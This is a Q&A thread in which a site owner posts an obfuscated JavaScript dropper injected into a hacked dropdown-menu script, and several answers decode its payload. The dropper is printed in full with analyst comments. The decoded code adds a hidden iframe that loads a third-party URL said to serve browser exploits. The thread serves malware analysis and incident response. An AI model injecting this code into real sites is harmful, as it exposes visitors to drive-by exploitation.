 

Site's Been Hacked - What Does This Javascript Code Do?

Just found out that my website has been hacked. I traced the problem to this piece of Javascript code that was inserted in the Suckerfish dropdown menu. I'm gonna replace the menu with a clean backup, but am just curious what does this piece of code actually do?

// Injected dropper found in the compromised menu script, kept byte-for-byte for analysis.
// What the visible code does: checks browser language, user agent and a marker cookie,
// then decodes a second stage from character codes and hands it to eval().
// NOTE(review): restoring the menu from a clean backup removes this script, but the page
// does not show how the file was modified; that entry point has to be found separately.
(function() {
    // kuk is the name of the marker cookie: read by c() below, written at the end.
    var kuk = 'ck5',
    de = document,
    n = navigator,
    u = n.userAgent,
    // 'anguage' is concatenated later into 'systemLanguage' / 'userLanguage' / 'language',
    // so those property names never appear literally in the file.
    l = 'anguage';
    // c(b): returns 1 when document.cookie holds a cookie named b, otherwise 0.
    // The method name is held in a string ('indexOf') and called through bracket access.
    // The inner l and the variable d are assigned but never read.
    function c(b) {
        var i = 'indexOf',
        l = 'length',
        c = de.cookie;
        b = b + "=";
        // First look for "; name=" (cookie somewhere after the first one).
        var a = c[i]("; " + b),
        d = c[i](";", a);
        if (a == -1) {
            // Not found that way: accept only "name=" at the very start of the cookie string.
            a = c[i](b);
            if (a != 0)
                return 0
        }
        return 1
    }
    // Gate for the payload; n is reused as a boolean. All three must hold:
    //   1. the browser language is exactly "en-gb" (case-insensitive),
    //   2. the user agent matches the "msie <version>" or "mozilla" pattern,
    //   3. the marker cookie is not set yet.
    // Consequence for triage: a visitor (or scanner) with another language setting, or one
    // that already carries the cookie, never reaches the eval below.
    n = /^en-gb$/i.test(n['systemL' + l] || n['userL' + l] || n['l' + l]) && /(msie) ([\w.]+)|(mozilla)(?:.*? rv:([\w.]+))?/i.test(u) && !c(kuk);
    if (n) {
        var s,
        // g is the offset added to every character code in the eval argument list.
        g = 2,
        // "harCode" is taken from a DOM text node instead of a string literal.
        aa = document.createTextNode("harCode");
        // NOTE(review): presumably a check that the script runs in a real JS engine; if it
        // were false, s would stay undefined and the eval line would throw.
        if (Math.exp(1) === Math.E) {
            // Resolves to String.fromCharCode, assembled from fragments so the name is not
            // present as plain text.
            s = String["fr" + "omC" + aa.nodeValue];
        }
        // Each argument is (value + g); the resulting string is executed by eval.
        // The answers on this page give the decoded text: a script that adds a hidden
        // 10x10 iframe pointing at a third-party URL.
        // Detection hint: eval fed by a fromCharCode reference built through string
        // concatenation, followed by a long arithmetic argument list.
        eval(s(7 + g, 7 + g, 103 + g, 100 + g, 30 + g, 38 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 30 + g, 99 + g, 106 + g, 113 + g, 99 + g, 30 + g, 121 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 117 + g, 112 + g, 103 + g, 114 + g, 99 + g, 38 + g, 32 + g, 58 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 30 + g, 113 + g, 112 + g, 97 + g, 59 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 30 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 59 + g, 37 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 56 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 57 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 56 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 57 + g, 106 + g, 99 + g, 100 + g, 114 + g, 56 + g, 46 + g, 57 + g, 114 + g, 109 + g, 110 + g, 56 + g, 46 + g, 
57 + g, 37 + g, 60 + g, 58 + g, 45 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 60 + g, 32 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 7 + g, 7 + g, 100 + g, 115 + g, 108 + g, 97 + g, 114 + g, 103 + g, 109 + g, 108 + g, 30 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 116 + g, 95 + g, 112 + g, 30 + g, 100 + g, 30 + g, 59 + g, 30 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 97 + g, 112 + g, 99 + g, 95 + g, 114 + g, 99 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 38 + g, 37 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 113 + g, 112 + g, 97 + g, 37 + g, 42 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 59 + g, 37 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 59 + g, 37 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 106 + g, 99 + g, 100 + g, 114 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 
114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 114 + g, 109 + g, 110 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 44 + g, 95 + g, 110 + g, 110 + g, 99 + g, 108 + g, 98 + g, 65 + g, 102 + g, 103 + g, 106 + g, 98 + g, 38 + g, 100 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g));
        // Write the marker cookie (value 1, path=/, expiry 3650 days ahead). On later page
        // views c(kuk) returns 1, so the gate above is false and the payload is skipped:
        // each browser is hit once, which also makes the infection hard to reproduce.
        n = new Date();
        n.setDate(n.getDate() + 3650);
        de.cookie = kuk + '=1;path=/;expires=' + n.toUTCString()
        }
})()
Jon Sutton Avatar asked Jul 10 '11 17:07

Jon Sutton




3 Answers

Change eval to alert and run it. The basic idea is that it grabs a bunch of information about the user and stores it in a cookie, then uses String.fromCharCode (it's obfuscated but still there) to decode and execute some more code, which creates an iframe to an evil site that probably attempts to gain access to the user's computer using various exploits.

http://fiddle.jshell.net/qHeJ3/

Here's the payload:

// Decoded second stage (the string passed to eval). It loads one hidden iframe.
// If <body> already exists the frame is added through the DOM by iframer(); otherwise
// the same frame is written into the document stream with document.write().
// NOTE(review): in this copy the URL literal is wrapped across two lines in both places;
// the other answers on this page show it as a single unbroken string.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // Frame attributes: 10x10, visibility:hidden, absolutely positioned at 0,0.
    document.write("<iframe src='http://asasasasa3.cz.cc/
index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

// iframer(): creates the iframe element, sets its src and hiding styles, and appends it
// to the first <body> element. The host and the tp= value in the src are the indicators
// to search for in site files and in proxy or web logs.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645e
ba4ede');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Christopher Tarquini Avatar answered Oct 19 '22 23:10

Christopher Tarquini


It embeds an invisible iframe from http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede.

Formatted code:

// Decoded payload, reformatted by the answerer. Two code paths, one result: a hidden
// 10x10 iframe whose src points at the third-party URL below.
if (document.getElementsByTagName('body')[0]) {
    // <body> is already present: build the frame through the DOM.
    iframer();
} else {
    // No <body> yet: emit the frame as markup into the document stream.
    document.write("<iframe " +
                 "src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' " +
                   "width='10' height='10' " +
                   "style='visibility:hidden;position:absolute;left:0;top:0;'>" +
                   "</iframe>")
}
// iframer(): DOM variant of the same injection. It is called above before its
// declaration, which works because function declarations are hoisted.
function iframer() {
     var f = document.createElement('iframe');
     f.setAttribute('src',
                    'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
     // Hidden and taken out of the page flow, so the frame does not disturb the layout.
     f.style.visibility='hidden';
     f.style.position='absolute';
     f.style.left='0';
     f.style.top='0';
     f.setAttribute('width','10');
     f.setAttribute('height','10');
     document.getElementsByTagName('body')[0].appendChild(f);
}

The page loaded from the above URL (executed code, after undoing another obfuscation layer) seems to try to exploit multiple vulnerabilities. It tries various plugins, and loads yet more pages, probably trying other exploits.

phihag Avatar answered Oct 20 '22 01:10

phihag


The eval(s(...)) call decodes to:

// Text produced by the String.fromCharCode call and executed by eval in the dropper.
// It injects a single hidden iframe; nothing else is done at this stage.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // Fallback when <body> is not available yet: write the frame markup directly.
    document.write("<iframe src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// iframer(): appends an <iframe> to <body> with the src below, width and height 10,
// visibility hidden and absolute position at left 0 / top 0.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Dan D. Avatar answered Oct 20 '22 00:10

Dan D.